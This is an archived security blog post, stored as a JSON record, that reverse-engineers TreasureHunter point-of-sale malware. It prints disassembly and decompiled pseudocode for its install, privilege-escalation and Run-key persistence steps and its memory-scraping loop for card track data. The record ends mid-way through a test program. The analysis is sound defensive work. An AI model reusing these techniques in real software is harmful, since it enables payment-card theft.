{
	"id": "70b5c366-be6c-4b7a-b059-b4f1af973cd2",
	"created_at": "2026-04-06T00:06:16.702673Z",
	"updated_at": "2026-04-10T13:11:56.26262Z",
	"deleted_at": null,
	"sha1_hash": "1475ab1536f3abf5cc9a55044958a27305ffac2d",
	"title": "TreasureHunter : A POS Malware Case Study - Security Blog",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 414410,
	"plain_text": "TreasureHunter : A POS Malware Case Study - Security Blog\r\nArchived: 2026-04-05 13:18:26 UTC\r\n26/02/2017\r\nTable of contents\r\nRAM Scraping : Looking for Credit Card Credentials\r\nRecap of TreasureHunter execution flow\r\nIntroduction\r\nTreasureHunter is a POS malware first observed in 2014 and which got some recognition through 2016. Most\r\nPOS malwares are pretty simple and don't have the advanced capabilities we can find in banking malwares for\r\nexample. Their main feature is RAM scraping, which consists of looking for PAN and other credit card credentials\r\nin running process' memory. Reversing them is rather quick and a good exercise if you're new to malware\r\nanalysis.\r\nPOS malwares are not very well documented and detailed articles about POS malwares are rare, so I thought it\r\nwould be interesting to reverse one and write a post about it. Furthermore, I decided to use radare2 to do so to\r\nbring a bit of originality. Plus, I've been enjoying using r2 a lot lately, it gets very efficient with a bit of practice.\r\nI downloaded the sample here : http://www.kernelmode.info/forum/viewtopic.php?\r\nf=16\u0026t=1756\u0026sid=40a9207c6336357f87455967de77a3ea\u0026start=230#p28535, kindly posted by Benkow.\r\nHashes :\r\n$ rahash2 -a md5,sha256,sha1 treasurehunter.bin\r\ntreasurehunter.bin: 0x00000000-0x00013bff md5: bd50b22d1caee56b5d3fbd8e7816ab88\r\ntreasurehunter.bin: 0x00000000-0x00013bff sha1: 55f39ca3b68b92e898f9f86f3de1b03d3b88f5d9\r\ntreasurehunter.bin: 0x00000000-0x00013bff sha256: 3f54aaa6d2cb5c7ff3f6d41790b40de47e8f870fe96aaecec4342ab84f700d\r\nVirusTotal Analysis, Malwr Analysis (When it's alive again).\r\nAnalysis\r\nFirst look\r\nBasic information about the binary :\r\n[0x0040523b]\u003e i\r\ntype EXEC (Executable file)\r\nhttp://adelmas.com/blog/treasurehunter.php\r\nPage 1 of 19\n\nfile treasurehunter.bin\r\nfd 6\r\nsize 0x13c00\r\niorw false\r\nblksz 0x0\r\nmode -r--\r\nblock 0x100\r\nformat pe\r\nhavecode 
true\r\npic true\r\ncanary false\r\nnx true\r\ncrypto false\r\nva true\r\nbintype pe\r\nclass PE32\r\narch x86\r\nbits 32\r\nmachine i386\r\nos windows\r\nminopsz 1\r\nmaxopsz 16\r\npcalign 0\r\nsubsys Windows GUI\r\nendian little\r\nstripped true\r\nstatic false\r\nlinenum false\r\nlsyms false\r\nrelocs false\r\nbinsz 80896\r\ncompiled Sun Oct 19 09:14:39 2014\r\ndbg_file C:\\\\Users\\\\Admin\\\\documents\\\\visual studio 2012\\\\Projects\\\\treasureHunter\\\\Release\\\\treasureHunter.pdb\r\nhdr.csum 0x00000000\r\ncmp.csum 0x000216eb\r\nguid 82A5304F6FFB4D168B2CFA9D11F54A991\r\nSome interesting strings :\r\nvaddr=0x0040fea8 paddr=0x0000e4a8 ordinal=451 sz=24 len=23 section=.rdata type=ascii string=J8DfbsnQabc730OkDqa\r\nvaddr=0x0040fec4 paddr=0x0000e4c4 ordinal=452 sz=28 len=13 section=.rdata type=wide string=Debug Message\r\nvaddr=0x0040fee0 paddr=0x0000e4e0 ordinal=453 sz=9 len=8 section=.rdata type=ascii string=System33\r\nvaddr=0x0040feec paddr=0x0000e4ec ordinal=454 sz=9 len=8 section=.rdata type=ascii string=SysWOW64\r\nvaddr=0x0040fef8 paddr=0x0000e4f8 ordinal=455 sz=22 len=21 section=.rdata type=ascii string=\\Windows\\explorer.ex\r\nvaddr=0x0040ff28 paddr=0x0000e528 ordinal=456 sz=147 len=146 section=.rdata type=ascii string=Mozilla/5.0 (compa\r\nvaddr=0x0040ffc0 paddr=0x0000e5c0 ordinal=457 sz=151 len=150 section=.rdata type=ascii string=Mozilla/5.0 (compa\r\nvaddr=0x00410058 paddr=0x0000e658 ordinal=458 sz=13 len=12 section=.rdata type=ascii string=?report=true\r\nvaddr=0x00410068 paddr=0x0000e668 ordinal=459 sz=14 len=13 section=.rdata type=ascii string=?request=true\r\nvaddr=0x00410078 paddr=0x0000e678 ordinal=460 sz=10 len=4 section=.rdata type=wide string=POST\r\nvaddr=0x00410088 paddr=0x0000e688 ordinal=461 sz=96 len=47 section=.rdata type=wide string=Content-Type: applica\r\nvaddr=0x0040fd58 paddr=0x0000e358 ordinal=439 sz=31 len=30 section=.rdata type=ascii 
string=x0000m.net/test/loca\r\nvaddr=0x00410320 paddr=0x0000e920 ordinal=473 sz=92 len=45 section=.rdata type=wide string=SOFTWARE\\Microsoft\\Wi\r\nvaddr=0x00410980 paddr=0x0000ef80 ordinal=492 sz=238 len=118 section=.rdata type=wide string=TreasureHunter vers\r\nImports :\r\n[0x0040523b]\u003e ii\r\n[Imports]\r\nordinal=001 plt=0x0040c020 bind=NONE type=FUNC name=KERNEL32.dll_ReadProcessMemory\r\nordinal=002 plt=0x0040c024 bind=NONE type=FUNC name=KERNEL32.dll_LeaveCriticalSection\r\nordinal=003 plt=0x0040c028 bind=NONE type=FUNC name=KERNEL32.dll_CreateProcessA\r\nordinal=004 plt=0x0040c02c bind=NONE type=FUNC name=KERNEL32.dll_CreateFileW\r\nordinal=005 plt=0x0040c030 bind=NONE type=FUNC name=KERNEL32.dll_CreateDirectoryA\r\nordinal=006 plt=0x0040c034 bind=NONE type=FUNC name=KERNEL32.dll_CopyFileA\r\nordinal=007 plt=0x0040c038 bind=NONE type=FUNC name=KERNEL32.dll_EnterCriticalSection\r\nordinal=008 plt=0x0040c03c bind=NONE type=FUNC name=KERNEL32.dll_Process32FirstW\r\nordinal=009 plt=0x0040c040 bind=NONE type=FUNC name=KERNEL32.dll_DeviceIoControl\r\nordinal=010 plt=0x0040c044 bind=NONE type=FUNC name=KERNEL32.dll_Module32FirstW\r\nordinal=011 plt=0x0040c048 bind=NONE type=FUNC name=KERNEL32.dll_GetModuleFileNameA\r\nordinal=012 plt=0x0040c04c bind=NONE type=FUNC name=KERNEL32.dll_Sleep\r\nordinal=013 plt=0x0040c050 bind=NONE type=FUNC name=KERNEL32.dll_CreateMutexA\r\nordinal=014 plt=0x0040c054 bind=NONE type=FUNC name=KERNEL32.dll_CreateToolhelp32Snapshot\r\nordinal=015 plt=0x0040c058 bind=NONE type=FUNC name=KERNEL32.dll_ReleaseMutex\r\nordinal=016 plt=0x0040c05c bind=NONE type=FUNC name=KERNEL32.dll_CloseHandle\r\nordinal=017 plt=0x0040c060 bind=NONE type=FUNC name=KERNEL32.dll_GetCurrentProcessId\r\nordinal=018 plt=0x0040c064 bind=NONE type=FUNC name=KERNEL32.dll_DeleteFileA\r\nordinal=019 plt=0x0040c068 bind=NONE type=FUNC name=KERNEL32.dll_CreateThread\r\nordinal=020 plt=0x0040c06c bind=NONE type=FUNC name=KERNEL32.dll_SetFilePointerEx\r\nordinal=021 
plt=0x0040c070 bind=NONE type=FUNC name=KERNEL32.dll_SetStdHandle\r\nordinal=022 plt=0x0040c074 bind=NONE type=FUNC name=KERNEL32.dll_GetConsoleMode\r\nordinal=023 plt=0x0040c078 bind=NONE type=FUNC name=KERNEL32.dll_OpenProcess\r\nordinal=024 plt=0x0040c07c bind=NONE type=FUNC name=KERNEL32.dll_InitializeCriticalSection\r\nordinal=025 plt=0x0040c080 bind=NONE type=FUNC name=KERNEL32.dll_VirtualQueryEx\r\nordinal=026 plt=0x0040c084 bind=NONE type=FUNC name=KERNEL32.dll_OutputDebugStringW\r\nordinal=027 plt=0x0040c088 bind=NONE type=FUNC name=KERNEL32.dll_WaitForSingleObject\r\nordinal=028 plt=0x0040c08c bind=NONE type=FUNC name=KERNEL32.dll_GetCurrentProcess\r\nordinal=029 plt=0x0040c090 bind=NONE type=FUNC name=KERNEL32.dll_Process32NextW\r\nordinal=030 plt=0x0040c094 bind=NONE type=FUNC name=KERNEL32.dll_ExitProcess\r\nordinal=031 plt=0x0040c098 bind=NONE type=FUNC name=KERNEL32.dll_GetConsoleCP\r\nordinal=032 plt=0x0040c09c bind=NONE type=FUNC name=KERNEL32.dll_FlushFileBuffers\r\nordinal=033 plt=0x0040c0a0 bind=NONE type=FUNC name=KERNEL32.dll_HeapSize\r\nordinal=034 plt=0x0040c0a4 bind=NONE type=FUNC name=KERNEL32.dll_RtlUnwind\r\nordinal=035 plt=0x0040c0a8 bind=NONE type=FUNC name=KERNEL32.dll_LoadLibraryW\r\nordinal=036 plt=0x0040c0ac bind=NONE type=FUNC name=KERNEL32.dll_LoadLibraryExW\r\nordinal=037 plt=0x0040c0b0 bind=NONE type=FUNC name=KERNEL32.dll_LCMapStringW\r\nordinal=038 plt=0x0040c0b4 bind=NONE type=FUNC name=KERNEL32.dll_GetLastError\r\nordinal=039 plt=0x0040c0b8 bind=NONE type=FUNC name=KERNEL32.dll_MultiByteToWideChar\r\nordinal=040 plt=0x0040c0bc bind=NONE type=FUNC name=KERNEL32.dll_HeapFree\r\nordinal=041 plt=0x0040c0c0 bind=NONE type=FUNC name=KERNEL32.dll_HeapAlloc\r\nordinal=042 plt=0x0040c0c4 bind=NONE type=FUNC name=KERNEL32.dll_WideCharToMultiByte\r\nordinal=043 plt=0x0040c0c8 bind=NONE type=FUNC name=KERNEL32.dll_HeapReAlloc\r\nordinal=044 plt=0x0040c0cc bind=NONE type=FUNC 
name=KERNEL32.dll_GetCommandLineA\r\nordinal=045 plt=0x0040c0d0 bind=NONE type=FUNC name=KERNEL32.dll_IsDebuggerPresent\r\nordinal=046 plt=0x0040c0d4 bind=NONE type=FUNC name=KERNEL32.dll_IsProcessorFeaturePresent\r\nordinal=047 plt=0x0040c0d8 bind=NONE type=FUNC name=KERNEL32.dll_EncodePointer\r\nordinal=048 plt=0x0040c0dc bind=NONE type=FUNC name=KERNEL32.dll_DecodePointer\r\nordinal=049 plt=0x0040c0e0 bind=NONE type=FUNC name=KERNEL32.dll_InterlockedIncrement\r\nordinal=050 plt=0x0040c0e4 bind=NONE type=FUNC name=KERNEL32.dll_InterlockedDecrement\r\nordinal=051 plt=0x0040c0e8 bind=NONE type=FUNC name=KERNEL32.dll_IsValidCodePage\r\nordinal=052 plt=0x0040c0ec bind=NONE type=FUNC name=KERNEL32.dll_GetACP\r\nordinal=053 plt=0x0040c0f0 bind=NONE type=FUNC name=KERNEL32.dll_GetOEMCP\r\nordinal=054 plt=0x0040c0f4 bind=NONE type=FUNC name=KERNEL32.dll_GetCPInfo\r\nordinal=055 plt=0x0040c0f8 bind=NONE type=FUNC name=KERNEL32.dll_SetLastError\r\nordinal=056 plt=0x0040c0fc bind=NONE type=FUNC name=KERNEL32.dll_GetCurrentThreadId\r\nordinal=057 plt=0x0040c100 bind=NONE type=FUNC name=KERNEL32.dll_GetProcessHeap\r\nordinal=058 plt=0x0040c104 bind=NONE type=FUNC name=KERNEL32.dll_GetModuleHandleExW\r\nordinal=059 plt=0x0040c108 bind=NONE type=FUNC name=KERNEL32.dll_GetProcAddress\r\nordinal=060 plt=0x0040c10c bind=NONE type=FUNC name=KERNEL32.dll_GetStdHandle\r\nordinal=061 plt=0x0040c110 bind=NONE type=FUNC name=KERNEL32.dll_WriteFile\r\nordinal=062 plt=0x0040c114 bind=NONE type=FUNC name=KERNEL32.dll_GetModuleFileNameW\r\nordinal=063 plt=0x0040c118 bind=NONE type=FUNC name=KERNEL32.dll_GetFileType\r\nordinal=064 plt=0x0040c11c bind=NONE type=FUNC name=KERNEL32.dll_InitializeCriticalSectionAndSpinCount\r\nordinal=065 plt=0x0040c120 bind=NONE type=FUNC name=KERNEL32.dll_DeleteCriticalSection\r\nordinal=066 plt=0x0040c124 bind=NONE type=FUNC name=KERNEL32.dll_GetStartupInfoW\r\nordinal=067 plt=0x0040c128 bind=NONE type=FUNC 
name=KERNEL32.dll_QueryPerformanceCounter\r\nordinal=068 plt=0x0040c12c bind=NONE type=FUNC name=KERNEL32.dll_GetSystemTimeAsFileTime\r\nordinal=069 plt=0x0040c130 bind=NONE type=FUNC name=KERNEL32.dll_GetEnvironmentStringsW\r\nordinal=070 plt=0x0040c134 bind=NONE type=FUNC name=KERNEL32.dll_FreeEnvironmentStringsW\r\nordinal=071 plt=0x0040c138 bind=NONE type=FUNC name=KERNEL32.dll_UnhandledExceptionFilter\r\nordinal=072 plt=0x0040c13c bind=NONE type=FUNC name=KERNEL32.dll_SetUnhandledExceptionFilter\r\nordinal=073 plt=0x0040c140 bind=NONE type=FUNC name=KERNEL32.dll_TerminateProcess\r\nordinal=074 plt=0x0040c144 bind=NONE type=FUNC name=KERNEL32.dll_TlsAlloc\r\nordinal=075 plt=0x0040c148 bind=NONE type=FUNC name=KERNEL32.dll_TlsGetValue\r\nordinal=076 plt=0x0040c14c bind=NONE type=FUNC name=KERNEL32.dll_TlsSetValue\r\nordinal=077 plt=0x0040c150 bind=NONE type=FUNC name=KERNEL32.dll_TlsFree\r\nordinal=078 plt=0x0040c154 bind=NONE type=FUNC name=KERNEL32.dll_GetModuleHandleW\r\nordinal=079 plt=0x0040c158 bind=NONE type=FUNC name=KERNEL32.dll_GetStringTypeW\r\nordinal=080 plt=0x0040c15c bind=NONE type=FUNC name=KERNEL32.dll_WriteConsoleW\r\nordinal=001 plt=0x0040c16c bind=NONE type=FUNC name=USER32.dll_MessageBoxA\r\nordinal=002 plt=0x0040c170 bind=NONE type=FUNC name=USER32.dll_MessageBoxW\r\nordinal=001 plt=0x0040c000 bind=NONE type=FUNC name=ADVAPI32.dll_AdjustTokenPrivileges\r\nordinal=002 plt=0x0040c004 bind=NONE type=FUNC name=ADVAPI32.dll_RegOpenKeyExW\r\nordinal=003 plt=0x0040c008 bind=NONE type=FUNC name=ADVAPI32.dll_LookupPrivilegeValueW\r\nordinal=004 plt=0x0040c00c bind=NONE type=FUNC name=ADVAPI32.dll_RegQueryValueExW\r\nordinal=005 plt=0x0040c010 bind=NONE type=FUNC name=ADVAPI32.dll_RegSetValueExA\r\nordinal=006 plt=0x0040c014 bind=NONE type=FUNC name=ADVAPI32.dll_OpenProcessToken\r\nordinal=007 plt=0x0040c018 bind=NONE type=FUNC name=ADVAPI32.dll_RegCloseKey\r\nordinal=001 plt=0x0040c164 
bind=NONE type=FUNC name=SHELL32.dll_SHGetFolderPathA\r\nordinal=001 plt=0x0040c178 bind=NONE type=FUNC name=WINHTTP.dll_WinHttpCloseHandle\r\nordinal=002 plt=0x0040c17c bind=NONE type=FUNC name=WINHTTP.dll_WinHttpQueryDataAvailable\r\nordinal=003 plt=0x0040c180 bind=NONE type=FUNC name=WINHTTP.dll_WinHttpSendRequest\r\nordinal=004 plt=0x0040c184 bind=NONE type=FUNC name=WINHTTP.dll_WinHttpReceiveResponse\r\nordinal=005 plt=0x0040c188 bind=NONE type=FUNC name=WINHTTP.dll_WinHttpOpen\r\nordinal=006 plt=0x0040c18c bind=NONE type=FUNC name=WINHTTP.dll_WinHttpOpenRequest\r\nordinal=007 plt=0x0040c190 bind=NONE type=FUNC name=WINHTTP.dll_WinHttpReadData\r\nordinal=008 plt=0x0040c194 bind=NONE type=FUNC name=WINHTTP.dll_WinHttpAddRequestHeaders\r\nordinal=009 plt=0x0040c198 bind=NONE type=FUNC name=WINHTTP.dll_WinHttpConnect\r\n99 imports\r\nA ton of debug messages are displayed in MessageBox() if a particular DWORD @ 0x00414EDC is set to 1. This confirms that TreasureHunter was still under development. What's curious is that the author copied the same lines of code everywhere he wanted to display a debug message. Such an inefficient way to debug your binary.\r\nInstallation\r\nWhen executed with no parameter, the malware copies itself to %APPDATA%\\{StringDerivedFromProductID}\\jucheck.exe, encrypts its path with a custom algorithm and launches this new copy as a process with the encrypted path as a parameter. This parameter is then converted from its hex value and decrypted by the fresh copy of the malware, which can then delete its old self. 
Not sure why the path is encrypted, but whatever.\r\n| 0x0040417c 8985ecfdffff mov dword [ebp - local_214h], eax\r\n| 0x00404182 8d85f4fdffff lea eax, [ebp - local_20ch]\r\n| 0x00404188 50 push eax\r\n| 0x00404189 6a00 push 0\r\n| 0x0040418b 6a00 push 0\r\n| 0x0040418d 6a1a push 0x1a ; CSIDL_APPDATA\r\n| 0x0040418f 6a00 push 0\r\n| 0x00404191 ff1564c14000 call dword [sym.imp.SHELL32.dll_SHGetFolderPathA] ; \"Z..\" @ 0x40c164\r\n[...]\r\n| `------\u003e 0x0040431a 6a00 push 0\r\n| ||| 0x0040431c ffb5e8fdffff push dword [ebp - local_218h] ; DerivatedFromProductId\r\n| ||| 0x00404322 ff1530c04000 call dword [sym.imp.KERNEL32.dll_CreateDirectoryA] ; \"z..\" @ 0x40c030\r\n| `-----\u003e 0x0040434b 6a01 push 1 ; \"Z.\"\r\n| |||| 0x0040434d 53 push ebx ; New filename (\"jucheck.exe\")\r\n| |||| 0x0040434e 8d85f8feffff lea eax, [ebp - local_108h]\r\n| |||| 0x00404354 50 push eax ; Path to this executable\r\n| |||| 0x00404355 ff1534c04000 call dword [sym.imp.KERNEL32.dll_CopyFileA] ; sym.imp.KERNEL32.dll_Co\r\n[...]\r\n| |||| 0x00404481 e84afbffff call reg_startup ; Writes [SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersi\r\n[...]\r\n| |||| 0x004044ed 6a00 push 0\r\n| |||| 0x004044ef 6a20 push 0x20 ; CREATE_NEW_PROCESS_GROUP\r\n| |||| 0x004044f1 6a00 push 0\r\n| |||| 0x004044f3 6a00 push 0\r\n| |||| 0x004044f5 6a00 push 0\r\n| |||| 0x004044f7 50 push eax ; Path to new executable + Encrypted path to this one\r\n| |||| 0x004044f8 53 push ebx ; Path to new executable\r\n| |||| 0x004044f9 ff1528c04000 call dword [sym.imp.KERNEL32.dll_CreateProcessA] ; \"Z..\" @ 0x40c028\r\nThe encrypted parameter is derived from the hardcoded value J8DfbsnQabc730OkDqaDmaC and the original malware path. Here is what I got :\r\n001DFB38 005A6930 \"C:\\\\Users\\\\arnaud\\\\AppData\\\\Roaming\\\\a18948d649742114cb84de349fe6f1d0\\\\jucheck.exe 014b789\r\nThe parameter is decrypted by the malware in the function @ 0x004023F0. 
IDA produces the corresponding pseudocode below :\r\n_BYTE *__usercall sub_4023F0@\u003ceax\u003e(int a1@\u003cedx\u003e, int a2@\u003cecx\u003e, int a3, _BYTE *buffer)\r\n{\r\n int v4; // eax@1\r\n int v5; // esi@1\r\n int v6; // edi@1\r\n _BYTE *buffer_out; // ebx@2\r\n int v8; // ecx@3\r\n bool v9; // zf@3\r\n _BYTE *result; // eax@4\r\n int v11; // [sp+8h] [bp-Ch]@2\r\n int v12; // [sp+10h] [bp-4h]@1\r\n v4 = a2;\r\n LOBYTE(v5) = 0;\r\n v6 = 0;\r\n v12 = a2;\r\n if ( a3 \u003c= 0 )\r\n {\r\n result = buffer;\r\n *buffer = 0;\r\n }\r\n else\r\n {\r\n buffer_out = buffer;\r\n v11 = a3;\r\n do\r\n {\r\n v6 = (v6 + 1) % 256;\r\n v8 = *(_DWORD *)(v4 + 4 * v6);\r\n v5 = (unsigned __int8)(v8 + v5);\r\n ++buffer_out;\r\n *(_DWORD *)(v12 + 4 * v6) = *(_DWORD *)(v4 + 4 * v5);\r\n *(_DWORD *)(v12 + 4 * v5) = v8;\r\n v9 = a3-- == 1;\r\n *(buffer_out - 1) = buffer_out[a1 - (_DWORD)buffer - 1] ^ *(_BYTE *)(v12\r\n + 4\r\n * (unsigned __int8)(v8\r\n + *(_DWORD *)(v12 + 4\r\n v4 = v12;\r\n }\r\n while ( !v9 );\r\n result = buffer;\r\n buffer[v11] = 0;\r\n }\r\n return result;\r\n}\r\nTreasureHunter tries to get Debug privileges before it starts its RAM scraping process, as shown by the assembly code below :\r\n| 0x00404730 8d442410 lea eax, [esp + local_10h] ; 0x10\r\n| 0x00404734 50 push eax\r\n| 0x00404735 6a28 push 0x28 ; '(' ; '('\r\n| 0x00404737 ff158cc04000 call dword [sym.imp.KERNEL32.dll_GetCurrentProcess] ; sym.imp.KERNEL3\r\n| 0x0040473d 50 push eax\r\n| 0x0040473e ff1514c04000 call dword [sym.imp.ADVAPI32.dll_OpenProcessToken] ; sym.imp.ADVAPI32\r\n| 0x00404744 8d442414 lea eax, [esp + local_14h] ; 0x14\r\n| 0x00404748 50 push eax\r\n| 0x00404749 68fc014100 push str.SeDebugPrivilege ; str.SeDebugPrivilege ; \"SeDebugPrivilege\"\r\n| 0x0040474e 6a00 push 0\r\n| 0x00404750 ff1508c04000 call dword [sym.imp.ADVAPI32.dll_LookupPrivilegeValueW] 
; sym.imp.ADV\r\n| 0x00404756 8b442414 mov eax, dword [esp + local_14h] ; [0x14:4]=0\r\n| 0x0040475a 6a00 push 0\r\n| 0x0040475c 89442424 mov dword [esp + local_24h], eax\r\n| 0x00404760 8b44241c mov eax, dword [esp + local_1ch] ; [0x1c:4]=0\r\n| 0x00404764 6a00 push 0\r\n| 0x00404766 6a10 push 0x10\r\n| 0x00404768 89442430 mov dword [esp + local_30h], eax\r\n| 0x0040476c 8d442428 lea eax, [esp + local_28h] ; 0x28 ; '('\r\n| 0x00404770 50 push eax\r\n| 0x00404771 6a00 push 0\r\n| 0x00404773 ff742424 push dword [esp + local_24h]\r\n| 0x00404777 c74424340100. mov dword [esp + local_34h], 1\r\n| 0x0040477f c74424400200. mov dword [esp + local_40h], 2\r\n| 0x00404787 ff1500c04000 call dword [sym.imp.ADVAPI32.dll_AdjustTokenPrivileges] ; \"\u0026..\" @ 0x4\r\nThen, the malware achieves persistency by writing a new startup key in the registry. See the \"Persistency\" part for more details about the reg_startup routine @ 0x403FD0.\r\nConfiguration\r\nThe configuration is pretty simple and hardcoded in global variables :\r\n| 0x00401618 b9d8fd4000 mov ecx, str.600000 ; \"600000\" @ 0x40fdd8\r\n| 0x0040161d e83efcffff call to_int\r\n| 0x00401622 b9f8fd4000 mov ecx, 0x40fdf8 ; \"180000\"\r\n| 0x00401627 a3944e4100 mov dword [0x414e94], eax ; [0x414e94:4]=0\r\n| 0x0040162c e82ffcffff call to_int\r\n| 0x00401631 a39c4e4100 mov dword [0x414e9c], eax ; [0x414e9c:4]=0\r\n| 0x00401636 33c0 xor eax, eax\r\n| 0x00401638 803d18fe4000. 
cmp byte [str.1SE_CLINGFISH_MODE_PLACEHOLDER], 0x31 ; [0x31:1]=0 ; '1\r\n| 0x0040163f b938fe4000 mov ecx, str.180000 ; \"180000\" @ 0x40fe38\r\n| 0x00401644 0f94c0 sete al\r\n| 0x00401647 a3b04e4100 mov dword [0x414eb0], eax ; [0x414eb0:4]=0\r\n| 0x0040164c e80ffcffff call to_int\r\n| 0x00401651 b95cfe4000 mov ecx, str.6000000 ; \"6000000\" @ 0x40fe5c\r\n| 0x00401656 a3a44e4100 mov dword [0x414ea4], eax ; [0x414ea4:4]=0\r\n| 0x0040165b e800fcffff call to_int\r\n| 0x00401660 b98cfe4000 mov ecx, 0x40fe8c ; \"50\"\r\n| 0x00401665 a3984e4100 mov dword [0x414e98], eax ; [0x414e98:4]=0\r\n| 0x0040166a e8f1fbffff call to_int\r\n| 0x0040166f 5f pop edi\r\n| 0x00401670 5e pop esi\r\n| 0x00401671 a3ac4e4100 mov dword [0x414eac], eax ; [0x414eac:4]=0\r\n| 0x00401676 c705844e4100. mov dword [0x414e84], str.J8DfbsnQabc730OkDqaDmaC ; [0x414e84:4]=0\r\nThese parameters are mostly waiting time values and the campaign id J8DfbsnQabc730OkDqaDmaC.\r\nPersistency\r\nTreasureHunter writes a new key in the startup registry to stay persistent on an infected system. 
The reg_startup routine is located @ 0x403FD0 :\r\n.-------------------------------------------------------------------------------------------------------------\r\n| [0x403fd0] ;[c] |\r\n| (fcn) sub.ADVAPI32.dll_RegOpenKeyExW_fd0 332 |\r\n| sub.ADVAPI32.dll_RegOpenKeyExW_fd0 (); |\r\n| ; var int local_4h @ ebp-0x4 |\r\n| ; CALL XREF from 0x00404481 (sub.KERNEL32.dll_WaitForSingleObject_120) |\r\n| push ebp |\r\n| mov ebp, esp |\r\n| push ecx |\r\n| push ebx |\r\n| push esi |\r\n| lea eax, [ebp - local_4h] |\r\n| push eax |\r\n| push 0xf003f |\r\n| push 0 |\r\n| ; \"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\" @ 0x410320 |\r\n| push str.SOFTWARE_Microsoft_Windows_CurrentVersion_Run ; str.SOFTWARE_Microsoft_Windows_CurrentVersion_Run |\r\n| push 0x80000002 |\r\n| mov ebx, ecx |\r\n| ; sym.imp.ADVAPI32.dll_RegOpenKeyExW |\r\n| call dword [sym.imp.ADVAPI32.dll_RegOpenKeyExW] ;[a] |\r\n| ; [0x40c170:4]=0x1139c reloc.USER32.dll_MessageBoxW_156 |\r\n| ; LEA sym.imp.USER32.dll_MessageBoxW |\r\n| ; sym.imp.USER32.dll_MessageBoxW |\r\n| mov esi, dword [sym.imp.USER32.dll_MessageBoxW] |\r\n| test eax, eax |\r\n| je 0x404096 ;[b] |\r\n`-------------------------------------------------------------------------------------------------------------'\r\n[Some checks...]\r\n.--------------------------------------------------------.\r\n| 0x4040a7 ;[s] |\r\n| sub ecx, edx |\r\n| ; 0x2 |\r\n| lea eax, [ecx*2 + 2] |\r\n| push eax |\r\n| push ebx |\r\n| push 1 |\r\n| push 0 |\r\n| ; \"jucheck\" @ 0x4104a4 |\r\n| push str.jucheck ; str.jucheck |\r\n| push dword [ebp - local_4h] ; Path to exe |\r\n| ; sym.imp.ADVAPI32.dll_RegSetValueExA |\r\n| call dword [sym.imp.ADVAPI32.dll_RegSetValueExA] ;[q] |\r\n| test eax, eax |\r\n| je 0x4040f2 ;[r] |\r\n`--------------------------------------------------------'\r\nRAM Scraping : Looking for Credit Card Credentials\r\nTreasureHunter doesn't have any hooking capabilities; it 
relies entirely on RAM scraping to try and steal credit card PANs. TreasureHunter lists all running processes the usual way (CreateToolhelp32Snapshot(), Process32FirstW(), Process32NextW()) and reads their memory with ReadProcessMemory(), looking for strings that match its track1 and track2 parsers. You can find information about the track1 and track2 formats and service codes on this Wikipedia page : https://en.wikipedia.org/wiki/Magnetic_stripe_card#Financial_cards; it helps in understanding the TreasureHunter parser.\r\nFor each process where the previous operations succeeded, the malware starts monitoring its memory using the same RAM scraping routine, looping in a thread every 180 seconds (value from config). I guess that's what the author calls \"Clingfish mode\".\r\nDWORD __stdcall thread_clingfish(LPVOID lpThreadParameter)\r\n{\r\n void *v1; // esi@1\r\n HANDLE v2; // edi@2\r\n v1 = malloc(0x20Au);\r\n if ( !v1 )\r\n {\r\n if ( bDebug == 1 )\r\n MessageBoxW(0, L\"cannot allocate more space!\", L\"Debug Message\", 0);\r\n ExitProcess(0);\r\n }\r\n v2 = OpenProcess(0x410u, 0, (DWORD)lpThreadParameter);\r\n if ( v2 \u0026\u0026 sub_403B10((DWORD)lpThreadParameter, (int)v1) )\r\n {\r\n if ( bDebug == 1 )\r\n MessageBoxW(0, L\"Clingfish mode activated!\", L\"Debug Message\", 0);\r\n while ( 1 )\r\n {\r\n search_process_mem(v2, (int)v1, lpThreadParameter);\r\n Sleep(dw180000);\r\n }\r\n }\r\n free(v1);\r\n CloseHandle(v2);\r\n return 0;\r\n}\r\nI identified the main functions of this thread responsible for looking for PANs, validating the track1 / track2 format and checking the Luhn algorithm and service codes :\r\n0x004038A0 : search_process_mem\r\n0x004033A0 : check_pan\r\n0x00403280 : parse_track1\r\n0x00403320 : parse_track2\r\n0x004031D0 : check_pattern\r\n0x00403040 : check_luhn\r\n0x00403140 : is_format_b\r\n0x004010C0 : check_service_codes\r\nYou can find an r2 script to label the main 
functions of the malware in the last part of this article.\r\nI won't detail the parsers; they strictly do what the Wikipedia page says. Note that a process is ignored if its name contains one of the following strings :\r\n[0x00413000]\u003e pd 3\r\n ; DATA XREF from 0x00403a9c (is_blacklisted)\r\n ; DATA XREF from 0x00403aa1 (is_blacklisted)\r\n0x00413000 .dword 0x0040fee0 ; str.System33\r\n0x00413004 .dword 0x0040feec ; str.SysWOW64\r\n0x00413008 .dword 0x0040fef8 ; str._Windows_explorer.exe\r\n[0x00413000]\u003e px 48 @ 0x0040fee0\r\n- offset - 0 1 2 3 4 5 6 7 8 9 A B C D E F 0123456789ABCDEF\r\n0x0040fee0 5379 7374 656d 3333 0000 0000 5379 7357 System33....SysW\r\n0x0040fef0 4f57 3634 0000 0000 5c57 696e 646f 7773 OW64....\\Windows\r\n0x0040ff00 5c65 7870 6c6f 7265 722e 6578 6500 0000 \\explorer.exe...\r\nWhy System33? No idea.\r\nFurthermore, TreasureHunter only picks PANs that have one of the following service codes (see the check_service_codes routine @ 0x004010C0) :\r\n[0x004010c0]\u003e pf zzzzzz @ 0x0040FF10\r\n0x0040ff10 = 101\r\n0x0040ff14 = 201\r\n0x0040ff18 = 121\r\n0x0040ff1c = 231\r\n0x0040ff20 = 221\r\n0x0040ff24 = 110\r\nIt increments a DWORD @ 0x00413D98 when a valid track1 / track2 PAN is found in a process, and sets it back to 0 after the PANs are sent to the gate.\r\nYou can easily trigger this type of malware by compiling and executing the following C++ code (taken from http://www.kernelmode.info/forum/viewtopic.php?f=16\u0026t=1756\u0026start=50#p18059) :\r\n#include \u003ciostream\u003e\r\n#include \u003cconio.h\u003e\r\n#include \u003cwindows.h\u003e\r\nusing namespace std;\r\nchar track1[100] = \"%B4560710014901111^TEST JIM/BOGUS JOS^1107101169940000000710717906968?\";\r\nchar track2[100] = \"4744870016311111=14091010000000000072\";\r\nint main(){\r\n cout \u003c\u003c track1 \u003c\u003c endl;\r\n cout \u003c\u003c track2 \u003c\u003c endl;\r\n 